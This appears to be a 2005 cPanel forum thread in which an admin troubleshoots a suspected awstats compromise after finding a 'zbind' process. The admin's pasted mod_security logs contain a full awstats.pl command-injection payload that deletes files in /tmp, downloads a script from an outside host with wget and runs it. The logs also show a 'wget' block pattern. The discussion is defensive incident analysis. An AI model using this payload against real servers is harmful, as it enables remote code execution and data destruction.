The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

awstats zbind exploit / urgent!!! critical

Discussion in 'Bind / DNS / Nameserver Issues' started by IPSecureNetwork, Jul 3, 2005.

  1. IPSecureNetwork

    IPSecureNetwork Well-Known Member

    Joined:
    May 28, 2005
    Messages:
    99
    Likes Received:
    0
    Trophy Points:
    6
    i have a sorprised when today im look the process in the server , i found a proccess called zbind and i m investigated and i found
    the zbind exploit . this exploits was affect the awstats .. please update the program or tellme what can i do to update my awstats and fix this .. thanx is URGENT
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Can you be a little clearer on this. That exploit is very common and can be installed by a whole variety of means (usually a phpBB or phpNuke installation). What was the file ownership of the exploit file(s)? If it was nobody:nobody and you are running with SUEXEC enabled, then it's not likely to have been an awstats.pl compromise as perl scripts will be running under the username and group of the account. It's more likely that you haven't upgraded all your phpBB installations to v2.0.16.
     
  3. IPSecureNetwork

    IPSecureNetwork Well-Known Member

    Joined:
    May 28, 2005
    Messages:
    99
    Likes Received:
    0
    Trophy Points:
    6
    more about the problem whit awstats

    the mod security can stop some of the attakers but one of the codes
    could be pass the mod security control.

    look.

    211.51.139.133 2005-06-27 20:25:11 (null) /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.pulameasuxtefute.com/sess_3539283e27d73cae29fe2b80f9293f59;perl%20sess_3539283e27d73cae29fe2b80f9293f59;echo%20;echo| HTTP/1.1 200.123.181.115 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
    211.51.139.133 2005-06-27 20:25:11 (null) /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.pulameasuxtefute.com/sess_3539283e27d73cae29fe2b80f9293f59;perl%20sess_3539283e27d73cae29fe2b80f9293f59;echo%20;echo| HTTP/1.1 200.123.181.114 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
    Access denied with code 406. Pattern match "/~nobody" at THE_REQUEST

    thats some of the codes used by the attakers.
    but i i dont know if the awstats have a new bug .. i think that is the problem .. a new bug in the code execution in awstats.pl.

    i post here the mail sended by te server to me . :

    Note: If this is the first time you recieved this mail, it contains the history for the entire month so far.

    Below are the recently upload scripts that contain code to send email. You may wish to inspect them to ensure they are not sending out SPAM.

    /home/demo/public_html/lndex.php:128: ";
    /home/demo/public_html/lndex.php:129: mail($adminEmail,"PHP Shell Warning - Unauthorized Access",$warnMsg,
    /home/demo/public_html/lndex.php:130: "From: $fromEmail\nX-Mailer:$THEVersion AutoWarn System"

    after this i delete de account demo . and i found the zbind process and i killed.
     
  4. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    But those were unsuccessful attempts at running awstats.pl and provide no proof at all that it could have been through awstats.pl that they gained access - did you see my comments about the file ownerships? You need to post the entries that actually show the successful compromise before you can start blaming awstats.pl
     

Share This Page